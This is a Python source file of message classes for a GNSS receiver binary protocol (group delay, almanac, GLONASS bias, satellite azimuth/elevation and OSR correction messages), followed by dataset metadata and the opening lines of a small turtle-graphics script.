      self.sender = kwargs.pop('sender', SENDER_ID)
      # All payload fields are mandatory; a missing keyword raises KeyError.
      for field in self.__class__.__slots__:
        setattr(self, field, kwargs.pop(field))

  def __repr__(self):
    return fmt_repr(self)

  @staticmethod
  def from_json(s):
    """Decode the JSON-encoded string `s` into a message object."""
    return MsgGroupDelayDepA.from_json_dict(json.loads(s))

  @staticmethod
  def from_json_dict(d):
    """Build a message object from an already-decoded JSON dict."""
    return MsgGroupDelayDepA(SBP.from_json_dict(d), **d)

  def from_binary(self, d):
    """Parse the binary payload `d` and copy each decoded field onto self."""
    parsed = MsgGroupDelayDepA._parser.parse(d)
    for field in self.__class__.__slots__:
      setattr(self, field, getattr(parsed, field))

  def to_binary(self):
    """Serialize the payload fields and return the fully framed message."""
    self.payload = MsgGroupDelayDepA._parser.build(
      containerize(exclude_fields(self)))
    return self.pack()

  def into_buffer(self, buf, offset):
    """Frame/pack this message into `buf` starting at `offset`."""
    self.payload = containerize(exclude_fields(self))
    self.parser = MsgGroupDelayDepA._parser
    self.stream_payload.reset(buf, offset)
    return self.pack_into(buf, offset, self._build_payload)

  def to_json_dict(self):
    """Return a JSON-serializable dict: frame header plus payload fields."""
    self.to_binary()
    d = super( MsgGroupDelayDepA, self).to_json_dict()
    d.update(walk_json_dict(exclude_fields(self)))
    return d
SBP_MSG_GROUP_DELAY_DEP_B = 0x0093
class MsgGroupDelayDepB(SBP):
  """SBP message MSG_GROUP_DELAY_DEP_B (0x0093).

  Deprecated group-delay message keyed by deprecated GNSS signal id.  See
  ICD-GPS-200 (30.3.3.3.1.1) for details.  Construct it from a parent
  `SBP` object (fields decoded from its payload) or inline from kwargs.

  Parameters
  ----------
  sbp : SBP
    SBP parent object to inherit from.
  t_op : GPSTimeSec
    Data Predict Time of Week
  sid : GnssSignalDep
    GNSS signal identifier
  valid : int
    bit-field indicating validity of the values,
    LSB indicating tgd validity etc.
    1 = value is valid, 0 = value is not valid.
  tgd : int
  isc_l1ca : int
  isc_l2c : int
  sender : int
    Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).

  """
  _parser = construct.Struct(
    't_op' / construct.Struct(GPSTimeSec._parser),
    'sid' / construct.Struct(GnssSignalDep._parser),
    'valid' / construct.Int8ul,
    'tgd' / construct.Int16sl,
    'isc_l1ca' / construct.Int16sl,
    'isc_l2c' / construct.Int16sl,)
  __slots__ = [
    't_op',
    'sid',
    'valid',
    'tgd',
    'isc_l1ca',
    'isc_l2c',
  ]

  def __init__(self, sbp=None, **kwargs):
    if sbp:
      super( MsgGroupDelayDepB,
             self).__init__(sbp.msg_type, sbp.sender, sbp.length,
                            sbp.payload, sbp.crc)
      self.from_binary(sbp.payload)
    else:
      super( MsgGroupDelayDepB, self).__init__()
      self.msg_type = SBP_MSG_GROUP_DELAY_DEP_B
      self.sender = kwargs.pop('sender', SENDER_ID)
      # All payload fields are mandatory; a missing keyword raises KeyError.
      for field in self.__class__.__slots__:
        setattr(self, field, kwargs.pop(field))

  def __repr__(self):
    return fmt_repr(self)

  @staticmethod
  def from_json(s):
    """Decode the JSON-encoded string `s` into a message object."""
    return MsgGroupDelayDepB.from_json_dict(json.loads(s))

  @staticmethod
  def from_json_dict(d):
    """Build a message object from an already-decoded JSON dict."""
    return MsgGroupDelayDepB(SBP.from_json_dict(d), **d)

  def from_binary(self, d):
    """Parse the binary payload `d` and copy each decoded field onto self."""
    parsed = MsgGroupDelayDepB._parser.parse(d)
    for field in self.__class__.__slots__:
      setattr(self, field, getattr(parsed, field))

  def to_binary(self):
    """Serialize the payload fields and return the fully framed message."""
    self.payload = MsgGroupDelayDepB._parser.build(
      containerize(exclude_fields(self)))
    return self.pack()

  def into_buffer(self, buf, offset):
    """Frame/pack this message into `buf` starting at `offset`."""
    self.payload = containerize(exclude_fields(self))
    self.parser = MsgGroupDelayDepB._parser
    self.stream_payload.reset(buf, offset)
    return self.pack_into(buf, offset, self._build_payload)

  def to_json_dict(self):
    """Return a JSON-serializable dict: frame header plus payload fields."""
    self.to_binary()
    d = super( MsgGroupDelayDepB, self).to_json_dict()
    d.update(walk_json_dict(exclude_fields(self)))
    return d
SBP_MSG_GROUP_DELAY = 0x0094
class MsgGroupDelay(SBP):
  """SBP message MSG_GROUP_DELAY (0x0094).

  Group-delay (TGD / inter-signal correction) message keyed by GNSS signal
  id.  See ICD-GPS-200 (30.3.3.3.1.1) for details.  Construct it from a
  parent `SBP` object (fields decoded from its payload) or inline from
  keyword arguments.

  Parameters
  ----------
  sbp : SBP
    SBP parent object to inherit from.
  t_op : GPSTimeSec
    Data Predict Time of Week
  sid : GnssSignal
    GNSS signal identifier
  valid : int
    bit-field indicating validity of the values,
    LSB indicating tgd validity etc.
    1 = value is valid, 0 = value is not valid.
  tgd : int
  isc_l1ca : int
  isc_l2c : int
  sender : int
    Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).

  """
  _parser = construct.Struct(
    't_op' / construct.Struct(GPSTimeSec._parser),
    'sid' / construct.Struct(GnssSignal._parser),
    'valid' / construct.Int8ul,
    'tgd' / construct.Int16sl,
    'isc_l1ca' / construct.Int16sl,
    'isc_l2c' / construct.Int16sl,)
  __slots__ = [
    't_op',
    'sid',
    'valid',
    'tgd',
    'isc_l1ca',
    'isc_l2c',
  ]

  def __init__(self, sbp=None, **kwargs):
    if sbp:
      super( MsgGroupDelay,
             self).__init__(sbp.msg_type, sbp.sender, sbp.length,
                            sbp.payload, sbp.crc)
      self.from_binary(sbp.payload)
    else:
      super( MsgGroupDelay, self).__init__()
      self.msg_type = SBP_MSG_GROUP_DELAY
      self.sender = kwargs.pop('sender', SENDER_ID)
      # All payload fields are mandatory; a missing keyword raises KeyError.
      for field in self.__class__.__slots__:
        setattr(self, field, kwargs.pop(field))

  def __repr__(self):
    return fmt_repr(self)

  @staticmethod
  def from_json(s):
    """Decode the JSON-encoded string `s` into a message object."""
    return MsgGroupDelay.from_json_dict(json.loads(s))

  @staticmethod
  def from_json_dict(d):
    """Build a message object from an already-decoded JSON dict."""
    return MsgGroupDelay(SBP.from_json_dict(d), **d)

  def from_binary(self, d):
    """Parse the binary payload `d` and copy each decoded field onto self."""
    parsed = MsgGroupDelay._parser.parse(d)
    for field in self.__class__.__slots__:
      setattr(self, field, getattr(parsed, field))

  def to_binary(self):
    """Serialize the payload fields and return the fully framed message."""
    self.payload = MsgGroupDelay._parser.build(
      containerize(exclude_fields(self)))
    return self.pack()

  def into_buffer(self, buf, offset):
    """Frame/pack this message into `buf` starting at `offset`."""
    self.payload = containerize(exclude_fields(self))
    self.parser = MsgGroupDelay._parser
    self.stream_payload.reset(buf, offset)
    return self.pack_into(buf, offset, self._build_payload)

  def to_json_dict(self):
    """Return a JSON-serializable dict: frame header plus payload fields."""
    self.to_binary()
    d = super( MsgGroupDelay, self).to_json_dict()
    d.update(walk_json_dict(exclude_fields(self)))
    return d
SBP_MSG_ALMANAC_GPS_DEP = 0x0070
class MsgAlmanacGPSDep(SBP):
  """SBP message MSG_ALMANAC_GPS_DEP (0x0070).

  Deprecated GPS almanac message: a set of satellite orbit parameters.
  Almanac data is not very precise and is considered valid for up to
  several months.  See ICD-GPS-200, Chapter 20.3.3.5.1.2 (Almanac Data),
  for details.  Construct it from a parent `SBP` object (fields decoded
  from its payload) or inline from keyword arguments.

  Parameters
  ----------
  sbp : SBP
    SBP parent object to inherit from.
  common : AlmanacCommonContentDep
    Values common for all almanac types
  m0 : double
    Mean anomaly at reference time
  ecc : double
    Eccentricity of satellite orbit
  sqrta : double
    Square root of the semi-major axis of orbit
  omega0 : double
    Longitude of ascending node of orbit plane at weekly epoch
  omegadot : double
    Rate of right ascension
  w : double
    Argument of perigee
  inc : double
    Inclination
  af0 : double
    Polynomial clock correction coefficient (clock bias)
  af1 : double
    Polynomial clock correction coefficient (clock drift)
  sender : int
    Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).

  """
  _parser = construct.Struct(
    'common' / construct.Struct(AlmanacCommonContentDep._parser),
    'm0' / construct.Float64l,
    'ecc' / construct.Float64l,
    'sqrta' / construct.Float64l,
    'omega0' / construct.Float64l,
    'omegadot' / construct.Float64l,
    'w' / construct.Float64l,
    'inc' / construct.Float64l,
    'af0' / construct.Float64l,
    'af1' / construct.Float64l,)
  __slots__ = [
    'common',
    'm0',
    'ecc',
    'sqrta',
    'omega0',
    'omegadot',
    'w',
    'inc',
    'af0',
    'af1',
  ]

  def __init__(self, sbp=None, **kwargs):
    if sbp:
      super( MsgAlmanacGPSDep,
             self).__init__(sbp.msg_type, sbp.sender, sbp.length,
                            sbp.payload, sbp.crc)
      self.from_binary(sbp.payload)
    else:
      super( MsgAlmanacGPSDep, self).__init__()
      self.msg_type = SBP_MSG_ALMANAC_GPS_DEP
      self.sender = kwargs.pop('sender', SENDER_ID)
      # All payload fields are mandatory; a missing keyword raises KeyError.
      for field in self.__class__.__slots__:
        setattr(self, field, kwargs.pop(field))

  def __repr__(self):
    return fmt_repr(self)

  @staticmethod
  def from_json(s):
    """Decode the JSON-encoded string `s` into a message object."""
    return MsgAlmanacGPSDep.from_json_dict(json.loads(s))

  @staticmethod
  def from_json_dict(d):
    """Build a message object from an already-decoded JSON dict."""
    return MsgAlmanacGPSDep(SBP.from_json_dict(d), **d)

  def from_binary(self, d):
    """Parse the binary payload `d` and copy each decoded field onto self."""
    parsed = MsgAlmanacGPSDep._parser.parse(d)
    for field in self.__class__.__slots__:
      setattr(self, field, getattr(parsed, field))

  def to_binary(self):
    """Serialize the payload fields and return the fully framed message."""
    self.payload = MsgAlmanacGPSDep._parser.build(
      containerize(exclude_fields(self)))
    return self.pack()

  def into_buffer(self, buf, offset):
    """Frame/pack this message into `buf` starting at `offset`."""
    self.payload = containerize(exclude_fields(self))
    self.parser = MsgAlmanacGPSDep._parser
    self.stream_payload.reset(buf, offset)
    return self.pack_into(buf, offset, self._build_payload)

  def to_json_dict(self):
    """Return a JSON-serializable dict: frame header plus payload fields."""
    self.to_binary()
    d = super( MsgAlmanacGPSDep, self).to_json_dict()
    d.update(walk_json_dict(exclude_fields(self)))
    return d
SBP_MSG_ALMANAC_GPS = 0x0072
class MsgAlmanacGPS(SBP):
  """SBP message MSG_ALMANAC_GPS (0x0072).

  GPS almanac message: a set of satellite orbit parameters.  Almanac data
  is not very precise and is considered valid for up to several months.
  See ICD-GPS-200, Chapter 20.3.3.5.1.2 (Almanac Data), for details.
  Construct it from a parent `SBP` object (fields decoded from its
  payload) or inline from keyword arguments.

  Parameters
  ----------
  sbp : SBP
    SBP parent object to inherit from.
  common : AlmanacCommonContent
    Values common for all almanac types
  m0 : double
    Mean anomaly at reference time
  ecc : double
    Eccentricity of satellite orbit
  sqrta : double
    Square root of the semi-major axis of orbit
  omega0 : double
    Longitude of ascending node of orbit plane at weekly epoch
  omegadot : double
    Rate of right ascension
  w : double
    Argument of perigee
  inc : double
    Inclination
  af0 : double
    Polynomial clock correction coefficient (clock bias)
  af1 : double
    Polynomial clock correction coefficient (clock drift)
  sender : int
    Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).

  """
  _parser = construct.Struct(
    'common' / construct.Struct(AlmanacCommonContent._parser),
    'm0' / construct.Float64l,
    'ecc' / construct.Float64l,
    'sqrta' / construct.Float64l,
    'omega0' / construct.Float64l,
    'omegadot' / construct.Float64l,
    'w' / construct.Float64l,
    'inc' / construct.Float64l,
    'af0' / construct.Float64l,
    'af1' / construct.Float64l,)
  __slots__ = [
    'common',
    'm0',
    'ecc',
    'sqrta',
    'omega0',
    'omegadot',
    'w',
    'inc',
    'af0',
    'af1',
  ]

  def __init__(self, sbp=None, **kwargs):
    if sbp:
      super( MsgAlmanacGPS,
             self).__init__(sbp.msg_type, sbp.sender, sbp.length,
                            sbp.payload, sbp.crc)
      self.from_binary(sbp.payload)
    else:
      super( MsgAlmanacGPS, self).__init__()
      self.msg_type = SBP_MSG_ALMANAC_GPS
      self.sender = kwargs.pop('sender', SENDER_ID)
      # All payload fields are mandatory; a missing keyword raises KeyError.
      for field in self.__class__.__slots__:
        setattr(self, field, kwargs.pop(field))

  def __repr__(self):
    return fmt_repr(self)

  @staticmethod
  def from_json(s):
    """Decode the JSON-encoded string `s` into a message object."""
    return MsgAlmanacGPS.from_json_dict(json.loads(s))

  @staticmethod
  def from_json_dict(d):
    """Build a message object from an already-decoded JSON dict."""
    return MsgAlmanacGPS(SBP.from_json_dict(d), **d)

  def from_binary(self, d):
    """Parse the binary payload `d` and copy each decoded field onto self."""
    parsed = MsgAlmanacGPS._parser.parse(d)
    for field in self.__class__.__slots__:
      setattr(self, field, getattr(parsed, field))

  def to_binary(self):
    """Serialize the payload fields and return the fully framed message."""
    self.payload = MsgAlmanacGPS._parser.build(
      containerize(exclude_fields(self)))
    return self.pack()

  def into_buffer(self, buf, offset):
    """Frame/pack this message into `buf` starting at `offset`."""
    self.payload = containerize(exclude_fields(self))
    self.parser = MsgAlmanacGPS._parser
    self.stream_payload.reset(buf, offset)
    return self.pack_into(buf, offset, self._build_payload)

  def to_json_dict(self):
    """Return a JSON-serializable dict: frame header plus payload fields."""
    self.to_binary()
    d = super( MsgAlmanacGPS, self).to_json_dict()
    d.update(walk_json_dict(exclude_fields(self)))
    return d
SBP_MSG_ALMANAC_GLO_DEP = 0x0071
class MsgAlmanacGloDep(SBP):
  """SBP message MSG_ALMANAC_GLO_DEP (0x0071).

  Deprecated GLONASS almanac message: a set of satellite orbit parameters.
  Almanac data is not very precise and is considered valid for up to
  several months.  See the GLO ICD 5.1, Chapter 4.5 ("Non-immediate
  information and almanac"), for details.  Construct it from a parent
  `SBP` object (fields decoded from its payload) or inline from kwargs.

  Parameters
  ----------
  sbp : SBP
    SBP parent object to inherit from.
  common : AlmanacCommonContentDep
    Values common for all almanac types
  lambda_na : double
    Longitude of the first ascending node of the orbit in PZ-90.02
    coordinate system
  t_lambda_na : double
    Time of the first ascending node passage
  i : double
    Value of inclination at instant of t_lambda
  t : double
    Value of Draconian period at instant of t_lambda
  t_dot : double
    Rate of change of the Draconian period
  epsilon : double
    Eccentricity at instant of t_lambda
  omega : double
    Argument of perigee at instant of t_lambda
  sender : int
    Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).

  """
  _parser = construct.Struct(
    'common' / construct.Struct(AlmanacCommonContentDep._parser),
    'lambda_na' / construct.Float64l,
    't_lambda_na' / construct.Float64l,
    'i' / construct.Float64l,
    't' / construct.Float64l,
    't_dot' / construct.Float64l,
    'epsilon' / construct.Float64l,
    'omega' / construct.Float64l,)
  __slots__ = [
    'common',
    'lambda_na',
    't_lambda_na',
    'i',
    't',
    't_dot',
    'epsilon',
    'omega',
  ]

  def __init__(self, sbp=None, **kwargs):
    if sbp:
      super( MsgAlmanacGloDep,
             self).__init__(sbp.msg_type, sbp.sender, sbp.length,
                            sbp.payload, sbp.crc)
      self.from_binary(sbp.payload)
    else:
      super( MsgAlmanacGloDep, self).__init__()
      self.msg_type = SBP_MSG_ALMANAC_GLO_DEP
      self.sender = kwargs.pop('sender', SENDER_ID)
      # All payload fields are mandatory; a missing keyword raises KeyError.
      for field in self.__class__.__slots__:
        setattr(self, field, kwargs.pop(field))

  def __repr__(self):
    return fmt_repr(self)

  @staticmethod
  def from_json(s):
    """Decode the JSON-encoded string `s` into a message object."""
    return MsgAlmanacGloDep.from_json_dict(json.loads(s))

  @staticmethod
  def from_json_dict(d):
    """Build a message object from an already-decoded JSON dict."""
    return MsgAlmanacGloDep(SBP.from_json_dict(d), **d)

  def from_binary(self, d):
    """Parse the binary payload `d` and copy each decoded field onto self."""
    parsed = MsgAlmanacGloDep._parser.parse(d)
    for field in self.__class__.__slots__:
      setattr(self, field, getattr(parsed, field))

  def to_binary(self):
    """Serialize the payload fields and return the fully framed message."""
    self.payload = MsgAlmanacGloDep._parser.build(
      containerize(exclude_fields(self)))
    return self.pack()

  def into_buffer(self, buf, offset):
    """Frame/pack this message into `buf` starting at `offset`."""
    self.payload = containerize(exclude_fields(self))
    self.parser = MsgAlmanacGloDep._parser
    self.stream_payload.reset(buf, offset)
    return self.pack_into(buf, offset, self._build_payload)

  def to_json_dict(self):
    """Return a JSON-serializable dict: frame header plus payload fields."""
    self.to_binary()
    d = super( MsgAlmanacGloDep, self).to_json_dict()
    d.update(walk_json_dict(exclude_fields(self)))
    return d
SBP_MSG_ALMANAC_GLO = 0x0073
class MsgAlmanacGlo(SBP):
  """SBP message MSG_ALMANAC_GLO (0x0073).

  GLONASS almanac message: a set of satellite orbit parameters.  Almanac
  data is not very precise and is considered valid for up to several
  months.  See the GLO ICD 5.1, Chapter 4.5 ("Non-immediate information
  and almanac"), for details.  Construct it from a parent `SBP` object
  (fields decoded from its payload) or inline from keyword arguments.

  Parameters
  ----------
  sbp : SBP
    SBP parent object to inherit from.
  common : AlmanacCommonContent
    Values common for all almanac types
  lambda_na : double
    Longitude of the first ascending node of the orbit in PZ-90.02
    coordinate system
  t_lambda_na : double
    Time of the first ascending node passage
  i : double
    Value of inclination at instant of t_lambda
  t : double
    Value of Draconian period at instant of t_lambda
  t_dot : double
    Rate of change of the Draconian period
  epsilon : double
    Eccentricity at instant of t_lambda
  omega : double
    Argument of perigee at instant of t_lambda
  sender : int
    Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).

  """
  _parser = construct.Struct(
    'common' / construct.Struct(AlmanacCommonContent._parser),
    'lambda_na' / construct.Float64l,
    't_lambda_na' / construct.Float64l,
    'i' / construct.Float64l,
    't' / construct.Float64l,
    't_dot' / construct.Float64l,
    'epsilon' / construct.Float64l,
    'omega' / construct.Float64l,)
  __slots__ = [
    'common',
    'lambda_na',
    't_lambda_na',
    'i',
    't',
    't_dot',
    'epsilon',
    'omega',
  ]

  def __init__(self, sbp=None, **kwargs):
    if sbp:
      super( MsgAlmanacGlo,
             self).__init__(sbp.msg_type, sbp.sender, sbp.length,
                            sbp.payload, sbp.crc)
      self.from_binary(sbp.payload)
    else:
      super( MsgAlmanacGlo, self).__init__()
      self.msg_type = SBP_MSG_ALMANAC_GLO
      self.sender = kwargs.pop('sender', SENDER_ID)
      # All payload fields are mandatory; a missing keyword raises KeyError.
      for field in self.__class__.__slots__:
        setattr(self, field, kwargs.pop(field))

  def __repr__(self):
    return fmt_repr(self)

  @staticmethod
  def from_json(s):
    """Decode the JSON-encoded string `s` into a message object."""
    return MsgAlmanacGlo.from_json_dict(json.loads(s))

  @staticmethod
  def from_json_dict(d):
    """Build a message object from an already-decoded JSON dict."""
    return MsgAlmanacGlo(SBP.from_json_dict(d), **d)

  def from_binary(self, d):
    """Parse the binary payload `d` and copy each decoded field onto self."""
    parsed = MsgAlmanacGlo._parser.parse(d)
    for field in self.__class__.__slots__:
      setattr(self, field, getattr(parsed, field))

  def to_binary(self):
    """Serialize the payload fields and return the fully framed message."""
    self.payload = MsgAlmanacGlo._parser.build(
      containerize(exclude_fields(self)))
    return self.pack()

  def into_buffer(self, buf, offset):
    """Frame/pack this message into `buf` starting at `offset`."""
    self.payload = containerize(exclude_fields(self))
    self.parser = MsgAlmanacGlo._parser
    self.stream_payload.reset(buf, offset)
    return self.pack_into(buf, offset, self._build_payload)

  def to_json_dict(self):
    """Return a JSON-serializable dict: frame header plus payload fields."""
    self.to_binary()
    d = super( MsgAlmanacGlo, self).to_json_dict()
    d.update(walk_json_dict(exclude_fields(self)))
    return d
SBP_MSG_GLO_BIASES = 0x0075
class MsgGloBiases(SBP):
  """SBP message MSG_GLO_BIASES (0x0075).

  GLONASS L1/L2 code-phase biases, which allow GPS+GLONASS integer
  ambiguity resolution for baselines with mixed receiver types (e.g.
  receivers from different manufacturers).  Construct it from a parent
  `SBP` object (fields decoded from its payload) or inline from kwargs.

  Parameters
  ----------
  sbp : SBP
    SBP parent object to inherit from.
  mask : int
    GLONASS FDMA signals mask
  l1ca_bias : int
    GLONASS L1 C/A Code-Phase Bias
  l1p_bias : int
    GLONASS L1 P Code-Phase Bias
  l2ca_bias : int
    GLONASS L2 C/A Code-Phase Bias
  l2p_bias : int
    GLONASS L2 P Code-Phase Bias
  sender : int
    Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).

  """
  _parser = construct.Struct(
    'mask' / construct.Int8ul,
    'l1ca_bias' / construct.Int16sl,
    'l1p_bias' / construct.Int16sl,
    'l2ca_bias' / construct.Int16sl,
    'l2p_bias' / construct.Int16sl,)
  __slots__ = [
    'mask',
    'l1ca_bias',
    'l1p_bias',
    'l2ca_bias',
    'l2p_bias',
  ]

  def __init__(self, sbp=None, **kwargs):
    if sbp:
      super( MsgGloBiases,
             self).__init__(sbp.msg_type, sbp.sender, sbp.length,
                            sbp.payload, sbp.crc)
      self.from_binary(sbp.payload)
    else:
      super( MsgGloBiases, self).__init__()
      self.msg_type = SBP_MSG_GLO_BIASES
      self.sender = kwargs.pop('sender', SENDER_ID)
      # All payload fields are mandatory; a missing keyword raises KeyError.
      for field in self.__class__.__slots__:
        setattr(self, field, kwargs.pop(field))

  def __repr__(self):
    return fmt_repr(self)

  @staticmethod
  def from_json(s):
    """Decode the JSON-encoded string `s` into a message object."""
    return MsgGloBiases.from_json_dict(json.loads(s))

  @staticmethod
  def from_json_dict(d):
    """Build a message object from an already-decoded JSON dict."""
    return MsgGloBiases(SBP.from_json_dict(d), **d)

  def from_binary(self, d):
    """Parse the binary payload `d` and copy each decoded field onto self."""
    parsed = MsgGloBiases._parser.parse(d)
    for field in self.__class__.__slots__:
      setattr(self, field, getattr(parsed, field))

  def to_binary(self):
    """Serialize the payload fields and return the fully framed message."""
    self.payload = MsgGloBiases._parser.build(
      containerize(exclude_fields(self)))
    return self.pack()

  def into_buffer(self, buf, offset):
    """Frame/pack this message into `buf` starting at `offset`."""
    self.payload = containerize(exclude_fields(self))
    self.parser = MsgGloBiases._parser
    self.stream_payload.reset(buf, offset)
    return self.pack_into(buf, offset, self._build_payload)

  def to_json_dict(self):
    """Return a JSON-serializable dict: frame header plus payload fields."""
    self.to_binary()
    d = super( MsgGloBiases, self).to_json_dict()
    d.update(walk_json_dict(exclude_fields(self)))
    return d
SBP_MSG_SV_AZ_EL = 0x0097
class MsgSvAzEl(SBP):
  """SBP message MSG_SV_AZ_EL (0x0097).

  Azimuth and elevation angles of all the visible satellites that the
  device has ephemeris or almanac for.  Construct it from a parent `SBP`
  object (fields decoded from its payload) or inline from keyword
  arguments.

  Parameters
  ----------
  sbp : SBP
    SBP parent object to inherit from.
  azel : array
    Azimuth and elevation per satellite
  sender : int
    Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).

  """
  # The payload is a repeated (greedy) list of per-satellite entries.
  _parser = construct.Struct(
    construct.GreedyRange('azel' / construct.Struct(SvAzEl._parser)),)
  __slots__ = [
    'azel',
  ]

  def __init__(self, sbp=None, **kwargs):
    if sbp:
      super( MsgSvAzEl,
             self).__init__(sbp.msg_type, sbp.sender, sbp.length,
                            sbp.payload, sbp.crc)
      self.from_binary(sbp.payload)
    else:
      super( MsgSvAzEl, self).__init__()
      self.msg_type = SBP_MSG_SV_AZ_EL
      self.sender = kwargs.pop('sender', SENDER_ID)
      # All payload fields are mandatory; a missing keyword raises KeyError.
      for field in self.__class__.__slots__:
        setattr(self, field, kwargs.pop(field))

  def __repr__(self):
    return fmt_repr(self)

  @staticmethod
  def from_json(s):
    """Decode the JSON-encoded string `s` into a message object."""
    return MsgSvAzEl.from_json_dict(json.loads(s))

  @staticmethod
  def from_json_dict(d):
    """Build a message object from an already-decoded JSON dict."""
    return MsgSvAzEl(SBP.from_json_dict(d), **d)

  def from_binary(self, d):
    """Parse the binary payload `d` and copy each decoded field onto self."""
    parsed = MsgSvAzEl._parser.parse(d)
    for field in self.__class__.__slots__:
      setattr(self, field, getattr(parsed, field))

  def to_binary(self):
    """Serialize the payload fields and return the fully framed message."""
    self.payload = MsgSvAzEl._parser.build(
      containerize(exclude_fields(self)))
    return self.pack()

  def into_buffer(self, buf, offset):
    """Frame/pack this message into `buf` starting at `offset`."""
    self.payload = containerize(exclude_fields(self))
    self.parser = MsgSvAzEl._parser
    self.stream_payload.reset(buf, offset)
    return self.pack_into(buf, offset, self._build_payload)

  def to_json_dict(self):
    """Return a JSON-serializable dict: frame header plus payload fields."""
    self.to_binary()
    d = super( MsgSvAzEl, self).to_json_dict()
    d.update(walk_json_dict(exclude_fields(self)))
    return d
SBP_MSG_OSR = 0x0640
class MsgOsr(SBP):
  """SBP message MSG_OSR (0x0640).

  The OSR message contains network corrections in an observation-like
  format.  Construct it from a parent `SBP` object (fields decoded from
  its payload) or inline from keyword arguments.

  Parameters
  ----------
  sbp : SBP
    SBP parent object to inherit from.
  header : ObservationHeader
    Header of a GPS observation message
  obs : array
    Network correction for a
    satellite signal.
  sender : int
    Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).

  """
  # Fixed header followed by a repeated (greedy) list of corrections.
  _parser = construct.Struct(
    'header' / construct.Struct(ObservationHeader._parser),
    construct.GreedyRange('obs' / construct.Struct(PackedOsrContent._parser)),)
  __slots__ = [
    'header',
    'obs',
  ]

  def __init__(self, sbp=None, **kwargs):
    if sbp:
      super( MsgOsr,
             self).__init__(sbp.msg_type, sbp.sender, sbp.length,
                            sbp.payload, sbp.crc)
      self.from_binary(sbp.payload)
    else:
      super( MsgOsr, self).__init__()
      self.msg_type = SBP_MSG_OSR
      self.sender = kwargs.pop('sender', SENDER_ID)
      # All payload fields are mandatory; a missing keyword raises KeyError.
      for field in self.__class__.__slots__:
        setattr(self, field, kwargs.pop(field))

  def __repr__(self):
    return fmt_repr(self)

  @staticmethod
  def from_json(s):
    """Decode the JSON-encoded string `s` into a message object."""
    return MsgOsr.from_json_dict(json.loads(s))

  @staticmethod
  def from_json_dict(d):
    """Build a message object from an already-decoded JSON dict."""
    return MsgOsr(SBP.from_json_dict(d), **d)

  def from_binary(self, d):
    """Parse the binary payload `d` and copy each decoded field onto self."""
    parsed = MsgOsr._parser.parse(d)
    for field in self.__class__.__slots__:
      setattr(self, field, getattr(parsed, field))

  def to_binary(self):
    """Serialize the payload fields and return the fully framed message."""
    self.payload = MsgOsr._parser.build(
      containerize(exclude_fields(self)))
    return self.pack()

  def into_buffer(self, buf, offset):
    """Frame/pack this message into `buf` starting at `offset`."""
    self.payload = containerize(exclude_fields(self))
    self.parser = MsgOsr._parser
    self.stream_payload.reset(buf, offset)
    return self.pack_into(buf, offset, self._build_payload)

  def to_json_dict(self):
    """Return a JSON-serializable dict: frame header plus payload fields."""
    self.to_binary()
    d = super( MsgOsr, self).to_json_dict()
    d.update(walk_json_dict(exclude_fields(self)))
    return d
# Dispatch table mapping SBP observation-group message type IDs to their
# Python classes; the framing layer uses it to decode incoming messages.
msg_classes = {
    0x004A: MsgObs,
    0x0044: MsgBasePosLLH,
    0x0048: MsgBasePosECEF,
    0x0081: MsgEphemerisGPSDepE,
    0x0086: MsgEphemerisGPSDepF,
    0x008A: MsgEphemerisGPS,
    0x008E: MsgEphemerisQzss,
    0x0089: MsgEphemerisBds,
    0x0095: MsgEphemerisGalDepA,
    0x008D: MsgEphemerisGal,
    0x0082: MsgEphemerisSbasDepA,
    0x0083: MsgEphemerisGloDepA,
    0x0084: MsgEphemerisSbasDepB,
    0x008C: MsgEphemerisSbas,
    0x0085: MsgEphemerisGloDepB,
    0x0087: MsgEphemerisGloDepC,
    0x0088: MsgEphemerisGloDepD,
    0x008B: MsgEphemerisGlo,
    0x0080: MsgEphemerisDepD,
    0x001A: MsgEphemerisDepA,
    0x0046: MsgEphemerisDepB,
    0x0047: MsgEphemerisDepC,
    0x0045: MsgObsDepA,
    0x0043: MsgObsDepB,
    0x0049: MsgObsDepC,
    0x0090: MsgIono,
    0x0091: MsgSvConfigurationGPSDep,
    0x0096: MsgGnssCapb,
    0x0092: MsgGroupDelayDepA,
    0x0093: MsgGroupDelayDepB,
    0x0094: MsgGroupDelay,
    0x0070: MsgAlmanacGPSDep,
    0x0072: MsgAlmanacGPS,
    0x0071: MsgAlmanacGloDep,
    0x0073: MsgAlmanacGlo,
    0x0075: MsgGloBiases,
    0x0097: MsgSvAzEl,
    0x0640: MsgOsr,
}
| 29.855911
| 98
| 0.616441
| 24,242
| 193,944
| 4.756662
| 0.030856
| 0.042537
| 0.011864
| 0.012852
| 0.877887
| 0.872276
| 0.863326
| 0.857646
| 0.849451
| 0.834153
| 0
| 0.017862
| 0.282953
| 193,944
| 6,496
| 99
| 29.855911
| 0.811314
| 0.344842
| 0
| 0.792877
| 0
| 0
| 0.054903
| 0
| 0
| 0
| 0.003643
| 0
| 0
| 1
| 0.104843
| false
| 0
| 0.001425
| 0.015385
| 0.226496
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
683e17c123ec58aabdebf37639862cca67858a2e
| 269
|
py
|
Python
|
code/chapter-1/exercise1_12.py
|
Kevin-Oudai/python-solutions
|
d67f6b14723b000fec0011c3e8156b805eb288f7
|
[
"MIT"
] | null | null | null |
code/chapter-1/exercise1_12.py
|
Kevin-Oudai/python-solutions
|
d67f6b14723b000fec0011c3e8156b805eb288f7
|
[
"MIT"
] | null | null | null |
code/chapter-1/exercise1_12.py
|
Kevin-Oudai/python-solutions
|
d67f6b14723b000fec0011c3e8156b805eb288f7
|
[
"MIT"
] | null | null | null |
"""Draw the exercise figure with turtle graphics.

Behaviour-identical rewrite of the original straight-line script:
the same turtle commands are issued in the same order, but they are
replayed from a data table instead of being written out one by one.
"""
import turtle as t

# (method name, argument) pairs, in the exact order of the original script.
